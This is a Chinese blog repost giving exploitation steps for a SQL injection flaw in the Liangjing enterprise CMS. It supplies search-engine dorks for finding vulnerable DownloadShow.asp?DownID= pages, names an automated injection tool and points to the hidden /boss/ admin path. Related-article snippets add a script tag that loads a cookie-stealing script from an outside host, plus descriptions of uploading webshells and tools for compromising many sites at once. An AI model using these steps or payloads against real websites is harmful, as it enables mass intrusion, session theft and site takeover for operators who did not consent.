良精企业管理系统注入漏洞

最新推荐文章于 2021-08-27 10:42:13 发布
最新推荐文章于 2021-08-27 10:42:13 发布
阅读量401 收藏
点赞数
原文链接:http://www.cnblogs.com/linaspx/archive/2009/09/11/1564917.html
版权

漏洞文件:

en/DownloadShow.asp

chinese/DownloadShow.asp

漏洞利用:

在百度键入:
inurl: (DownloadShow.asp?DownID=)

在谷歌键入:
allinurl: DownloadShow.asp?DownID=

获得搜索页面地址复制下来.打开阿D2.32.将地址粘贴到检测地址栏里就会看到软件下方有很多可用注入点

比如:http://www.xxx.cn/Chinese/DownloadShow.asp?DownID=50

删除:Chinese/DownloadShow.asp?DownID=50

在域名后面加上后台路径:BOSS 也就是http://www.xxx.cn/boss/

漏洞说明:
downid,过滤不严,导致sql注入的产生

转载于:https://www.cnblogs.com/linaspx/archive/2009/09/11/1564917.html

weixin_30387339
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通杀良精南方数据网软上传漏洞
12-16
通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞
通杀良精南方数据网软上传漏洞工具
02-16
具体漏洞文件路径要在源代码修改![upfile_other.asp]上传木马文件记得加空格
良精管理系统漏洞
weixin_30896825的博客
05-12 400
主题:良精多风格多语企业网站管理系统漏洞难度:知识点:脚本、跨站工具包:get.php MyBrower.exe qq.js漏洞处:公司名称跨站漏洞今天让大家看一下漏洞的利用方法 <script src=http://192.168.1.101/qq.js></script> 192.168.1.101/get.php是我们获得COOKIE的程序192.1...
良精企业通用建站系统漏洞总汇
fengling132的专栏
06-05 2183
一,SQl注入漏洞 1,典型的Cookies注入 漏洞文件:Shownews.asp 问题代码:id=cstr(request(“id”)) Set rsnews=Server.CreateObject(“ADODB.RecordSet”) sql=”update news set hits=hits+1 where id=”&id conn.execute sql sq
良精cms php版漏洞,南方数据、良精系统、网软天下漏洞利用
weixin_36330518的博客
03-10 810
1、通过upfile_other.asp漏洞文件直接取SHELL直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:BODY {FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee}.tx1 {BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px s...
良精企业智能建站管理系统
08-15
"良精企业智能建站管理系统"是一款基于PHP开发的开源企业网站管理平台,旨在帮助企业轻松构建和管理自己的官方网站。这款系统具有高度的灵活性和可定制性,使得企业网站的优化变得更加直接有效,避免了不必要的复杂...
南方数据漏洞爆破工具.rar
06-01
适合刚学网站渗透的新手、每天弄几个shell应该不是问题!详细用法见工具上说明,此工具为易语言打造,你懂的!
南方数据漏洞 想拿shell的就下吧
06-28
南方数据漏洞 感觉还不错!!!!
良精南方cms /inc/Check_Sql.asp SQL Injection Based On Cookie
weixin_30940783的博客
09-09 236
catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Relevant Link:2. 漏洞触发条件 0x1: POC using System; using System.Collections; using System.Net; using System.Text...
google找后台用法
hanghangde的博客
05-22 8171
site:url.com '查看这个站点上的信息最好不加www,可以查看到不少的二级域名信息,可以有不小的收获哈 最好与inurl,intext等联用,效果更佳.. ============================================================================= intext:测试     '查看文本种包含"测
利用南方数据企业0day漏洞批量入侵
04-24
利用南方数据企业0day漏洞批量入侵
若依后台管理系统 v4.1
09-29
一直想做一款后台管理系统,看了很多优秀的开源项目但是发现没有合适自己的。于是利用空闲休息时间开始自己写一套后台系统。如此有了若依管理系统。她可以用于所有的Web应用程
良精南方网站系统拿webshell的教程
03-06
通过利用良精南方系统漏洞,实现进入网站后台,并上传 。马,得到一个webshell的教程,讲述详细,一看就会。利用该方法,可以配合工具实现批量拿站。
良精V3.9 企业整站WEB2.0
09-27
良精V3.9 企业整站 CMS系统 WEB2.0 界面华丽企业整站 功能实用整站
良精通用网站管理系统黄色2007(亲用,完整)
06-28
自己用的,经常用来建站,没问题,大家可以下载
2021年8月27日10点29分 常见漏洞
weixin_42315611的博客
08-27 400
CSRF客户端请求伪造 CSRF(Cross Site Request Forgery) 是一种挟制终端用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 漏洞原因:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 利用前提:攻击者可以得到url的所有参数项并了解其含义,并且这些参数的值是用户可以 控制的,这时就可以根据URL构造一个payload。CSRF通常是发生在有意义的操作上,比如修改资料,加关注等其他一些敏感操作。 发现漏洞 确定功能点并抓包 寻找
NQSky-前世今生
lulusayhi的博客
03-07 7457
7年移动技术沉淀 国信灵通发布国产MDM产品—NQSky移动管理平台 2012年12月5日,国内领先的移动服务提供商北京国信灵通网络科技有限公司(Nation Sky)在北京发布了国内具有完全自主知识产权的MDM(Mobile Device Management)产品——NQSky移动管理平台,同时也是国内首款能够在移动设备、移动应用、移动内容管理全功能覆盖的产品。 随着后
国外WEB漏洞的利用到社会工程学批量拿Webshell
SnakeHu
10-21 3265
[原创]国外WEB漏洞的利用到社会工程学批量拿Webshell信息来源:邪恶八进制信息安全团队(www.eviloctal.com)文章属性:漏洞利用原文作者:独孤依人[SST]发布时间:2006-09-08 关键字:包含漏洞 社会工程学 Google hack注:首发于脚本安全小组(http://www.cnsst.net/)内部交流版
千博企业网站管理系统HitCount.Asp页面注入漏洞
fengling132的专栏
05-02 1263
程序都加入了防注入代码的,在NoSql.asp文件7kccopyd-code If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = "’|;|and|exec|insert|select|delete|update|c

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值